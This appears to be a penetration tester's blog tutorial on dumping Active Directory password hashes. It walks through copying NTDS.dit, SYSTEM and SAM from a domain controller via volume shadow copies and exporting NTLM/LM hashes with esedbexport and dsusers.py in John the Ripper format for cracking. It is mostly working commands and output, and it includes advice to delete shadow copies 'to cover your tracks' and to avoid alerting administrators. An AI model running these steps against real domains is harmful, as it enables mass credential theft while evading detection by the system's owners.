Getting Hashes from NTDS.dit File

Getting Hashes from NTDS.dit File

Having completed many internal penetration tests for clients, we always want to collect the NTDS.dit file from a domain controller if we get access. The primary reason to pull this file from a Windows Domain Controller is to get a password for another account (to access the truly desired data). Generally, the coveted access is to a MSSQL Database or some application where the Domain Admins do not have access, but other domain users do.

Some people might ask why we would not just change the password for the account we were after — since we were the Domain Administrator. The answer is that changing passwords on accounts could alert users or administrators that something is happening.

This post is written with the expectation that the person reading it has some technical knowledge of Windows systems, and processes involved with using and installing software.

Once you have access to a domain controller, the first step is to copy the needed files from the Volume Shadow Copy or create a copy if needed. We generally prefer to create a new copy so we know it has the latest information.

Get ntds.dit and SYSTEM from Volume Shadow Copy on Host

Luckily Windows has built in tools to assist with collecting the files needed.

Vssadmin tool

List Volume Shadow Copies on the system:

C:\vssadmin list shadows

Example: ‘vssadmin list shadows’ no Shadows Available

C:\>vssadmin list shadows
vssadmin 1.1 – Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001 Microsoft Corp.

No items found that satisfy the query.

Create a new Volume Shadow Copy of the current drive:

C:\vssadmin create shadow /for=C:

Example: ‘vssadmin create shadow’ copy:

C:\>vssadmin create shadow /for=c:
vssadmin 1.1 – Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001 Microsoft Corp.

Successfully created shadow copy for ‘c:\’
Shadow Copy ID: {e8eb7931-5056-4f7d-a5d7-05c30da3e1b3}
Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1

Pull files from the Volume Shadow Copy: (EXAMPLES)

The volume shadow copy looks similar to the lines below:

\\?\GLOBALROOT\Device\<SHADOWYCOPY DISK>\windows\<directory>\<File> <where to put file>

NOTE: The dot (.) at the end of the copy line will place the file in your current working directory.

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\ntds\ntds.dit .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SYSTEM .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SAM .

[X] Refers to the shadow copy number, in the examples above the latest versions is HarddiskVolumeShadowCopy1 (there could be multiple copies, use the last one listed)

Registray Save

We also recommend getting a current copy of SYSTEM from the registry just in case. There were times where the SYSTEM file from the shadow copy was corrupt.

reg SAVE HKLM\SYSTEM c:\SYS

Delete the shadows to cover your tracks:

vssadmin delete shadows /for= [/oldest | /all | /shadow=] [/quiet]

EXAMPLE:

vssadmin delete shadows /for=C: /shadow=e8eb7931-5056-4f7d-a5d7-05c30da3e1b3

Optional VSSOwn Script to help with this task:

We generally do not try to move files onto the system we compromised.

VSSOwn script:

http://ptscripts.googlecode.com/svn/trunk/windows/vssown.vbs

Now that you have the files, move them to your host. There are many methods for doing this, use your favorite.

Now that you have the files on your host, it is time to get the hashes.

Utilities needed:

  • libesedb
  • ntdsxtract

 libesedb

Download libesedb: (Use which ever method you are comfortable with below)

Release Code:

https://github.com/libyal/libesedb/releases

(Download and unzip)

Compile Code:

https://github.com/libyal/libesedb

https://github.com/libyal/libesedb/wiki/Building

git clone https://github.com/libyal/libesedb.git
cd libesedb/
./configure
make

esedbexport usage:
Use esedbexport to export items stored in an Extensible Storage Engine (ESE)
Database (EDB) file

Usage: esedbexport [ -c codepage ] [ -l logfile ] [ -m mode ] [ -t target ] [ -T table_name ] [ -hvV ]

source source: the source file

-c: codepage of ASCII strings, options: ascii, windows-874,
windows-932, windows-936, windows-1250, windows-1251,
windows-1252 (default), windows-1253, windows-1254
windows-1255, windows-1256, windows-1257 or windows-1258
-h: shows this help
-l: logs information about the exported items
-m: export mode, option: all, tables (default)
‘all’ exports all the tables or a single specified table with indexes,
‘tables’ exports all the tables or a single specified table
-t: specify the basename of the target directory to export to
(default is the source filename) esedbexport will add the suffix
.export to the basename
-T: exports only a specific table
-v: verbose output to stderr
-V: print version

Runing esedbexport to extract ntds.dit data:

./esedbexport  -t  <Directory to export data to(.export  will be added to the end)> <ntds.dit file>

EXAMPLE:

# ./esedbexport -t ~/ntds ~/ntds.dit
esedbexport 20150409

Opening file.
Exporting table 1 (MSysObjects) out of 11.
Exporting table 2 (MSysObjectsShadow) out of 11.
Exporting table 3 (MSysUnicodeFixupVer1) out of 11.
Exporting table 4 (datatable) out of 11.
Exporting table 5 (link_table) out of 11.
Exporting table 6 (hiddentable) out of 11.
Exporting table 7 (sdproptable) out of 11.
Exporting table 8 (sd_table) out of 11.
Exporting table 9 (quota_table) out of 11.
Exporting table 10 (quota_rebuild_progress_table) out of 11.
Exporting table 11 (MSysDefrag1) out of 11.
Export completed.

(Depending on the number of user accounts this can take some time to generate)
Extracted files:

# ls ~/ntdis.export/
MSysObjects.0
MSysObjectsShadow.1
MSysUnicodeFixupVer1.2
datatable.3
link_table.4
hiddentable.5
sdproptable.6
sd_table.7
quota_table.8
quota_rebuild_progress_table.9
MSysDefrag1.10

NTDSXtract:
http://www.ntdsxtract.com/

CURRENT BUILD:
https://github.com/csababarta/ntdsxtract

git clone https://github.com/csababarta/ntdsxtract.git

Usage for dsuser.py
DSUsers v1.3.3
Extracts information related to user objects

usage: ./dsusers.py [option] datatable
The path to the file called datatable extracted by esedbexport
linktable
The path to the file called linktable extracted by esedbexport
work directory
The path to the directory where ntdsxtract should store its cache files and output files. If the directory does not exist it will be created.

options:
–sid
List user identified by SID
–guid
List user identified by GUID
–name
List user identified by the regular expression
–active
List only active accounts
–locked
List only locked accounts
–syshive Required for password hash and history extraction
This option should be specified before the password hash
and password history extraction options!
–lmoutfile
–ntoutfile
–pwdformat ophc – OphCrack format
When this format is specified the NT output file will be used
john – John The Ripper format
ocl – oclHashcat format
When this format is specified the NT output file will be used
–passwordhashes
Extract password hashes
–passwordhistory
Extract password history
–certificates
Extract certificates
–supplcreds
Extract supplemental credentials (e.g.: clear text passwords,
kerberos keys)
–membership
List groups of which the user is a member
–csvoutfile
The filename of the csv file to which ntdsxtract should write the
output
–debug
Turn on detailed error messages and stack trace

Extracting user info:
python dsusers.py [option] (datatable and linktable are from the previously extracted files)

–lmoutfile (output file for LM hashes)
–ntoutfile (output file for NTLM hashes
–pwdformat john (output in JTR format)
–syshive (SYSTEM file from system where the NTDS.dit was retrieved)

#python dsusers.py <DATATABLE FILE><LINKTABLE FILES><DIRECTORY TO WORK IN>–passwordhashes –lmoutfile <LM OUT FILE> –ntoutfile <NTLM OUT FILE> –pwdformat john –syshive <SYSTEM FILE>

(Add –passwordhistory to get previous hashes for each user, will vary on number hashes based on Domain settings for password history)

Example Output in JTR Format
# python dsusers.py ~/ntds.export/datatable.3 ~/ntds.export/link_table.4 ~/TEMP –passwordhashes –lmoutfile LM.out –ntoutfile NT.out –pwdformat john –syshive ~/SYSTEM
[+] Started at: Wed, 22 Apr 2015 01:47:11 UTC
[+] Started with options:
[-] Extracting password hashes
[-] LM hash output filename: LM.out
[-] NT hash output filename: NT.out
[-] Hash output format: john The directory (/root/TEMP) specified does not exists!
Would you like to create it? [Y/N] y
[+] Initialising engine…
[+] Loading saved map files (Stage 1)…
[!] Warning: Opening saved maps failed: [Errno 2] No such file or directory: ‘/root/TEMP/offlid.map’ [+] Rebuilding maps…
[+] Scanning database – 100% -> 40933 records processed
[+] Sanity checks…
Schema record id: 1481
Schema type id: 10
[+] Extracting schema information – 100% -> 4142 records processed
[+] Loading saved map files (Stage 2)…
[!] Warning: Opening saved maps failed: [Errno 2] No such file or directory: ‘/root/TEMP/links.map’
[+] Rebuilding maps…
[+] Extracting object links…
List of users:

==============
(This will scroll across the screen for a while depending on the number of accounts in the Domain)

Record ID: 32777
User name: FName LName
User principal name: email@address.net
SAM Account name: name
SAM Account type: SAM_NORMAL_USER_ACCOUNT
GUID: 14a15a2a-887a-4444-a54a-aa6a4a689a00
SID: S-1-5-21-350701555-3721294507-2303513147-3801
When created: 2005-06-01 13:50:37
When changed: 2013-12-12 15:08:12
Account expires: Never
Password last set: 2013-10-07 13:20:19.146593
Last logon: 2013-12-11 18:35:10.166785
Last logon timestamp: 2013-12-12 15:08:12.281517
Bad password time 2013-12-11 00:04:52.446209
Logon count: 6239
Bad password count: 0
User Account Control:
NORMAL_ACCOUNT
Ancestors:
$ROOT_OBJECT$ local DOMAIN JOB Users FName LName
Password hashes:
name:$NT$2c8f14b95129b6eb77b1f69d04ff4000:::
name:e4c3436ddd1f625c6fede0fa5525f000:::

(Once this finishes you will have the new files with LM hashes and NTLM hashes in your working directory)

Now you have what you need it is time to start cracking passwords to get to that data you wanted.

 


Comments are closed.